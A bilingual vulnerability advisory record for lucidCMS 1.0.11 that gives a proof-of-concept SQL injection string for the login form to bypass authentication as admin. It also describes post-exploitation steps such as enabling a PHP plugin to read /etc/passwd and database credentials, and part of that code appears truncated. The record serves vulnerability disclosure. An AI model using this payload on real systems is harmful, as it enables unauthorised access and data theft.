https://www.exploit-db.com/exploits/26307
https://cxsecurity.com/issue/WLB-2005090028
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-002

lucidCMS是一款简单灵活的内容管理系统。lucidCMS1.0.11允许攻击者通过登录框执行任意的SQL指令。lucidCMS中存在多个输入验证错误：1)如果关闭魔术引号的话就会导致SQL注入：在登录表单中输入以下内容，以管理员登录：登录：’UNION(SELECT’1’，’admin’，’admin’，’[email protected]’，’d41d8cd98f00b204e9800998ecf8427e’，’1′)/*口令：无^||这是哈希md5(”)的结果注意：登录中没有空格登录请求变为：SELECT*FROMlucid_usersWHEREname=”UNION(SELECT’1’，’admin’，’admin’，’[email protected]’，’d41d8cd98f00b204e9800998ecf8427e’，’1′)/*’2)现在新的管理员就可以编辑模板、注入恶意javascript代码、查看phpinfo()、管理用户/组、激活/禁用插件。攻击者可以激活renderPHP插件，在主样式表末尾添加以下行：temp.txt’);?>查看/etc/passwd文件：temp.txt’);?>查看数据库用户名/口令、数据库名称和表格前缀，这样就可以完全控制数据库系统。

source: http://www.securityfocus.com/bid/14976/info

lucidCMS is prone to to an SQL injection vulnerability.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

Ultimately an attacker could exploit this vulnerability to gain administrative privileges. This could facilitate a compromise of the underlying system; other attacks are also possible.

The following proof of concept demonstrates data to be entered into the login and password fields of the login page:

login: 'UNION(SELECT'1','admin','admin','[email protected]','d41d8cd98f00b204e9800998ecf8427e','1')/*
pass: [nothing]

来源:BUGTRAQ
名称:20050929LucidCMS1.0.11SQLInjection/LoginBypass/remotecodeexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112803020415743&w;=2
来源:BID
名称:14976
链接:http://www.securityfocus.com/bid/14976
来源:SREASON
名称:33
链接:http://securityreason.com/securityalert/33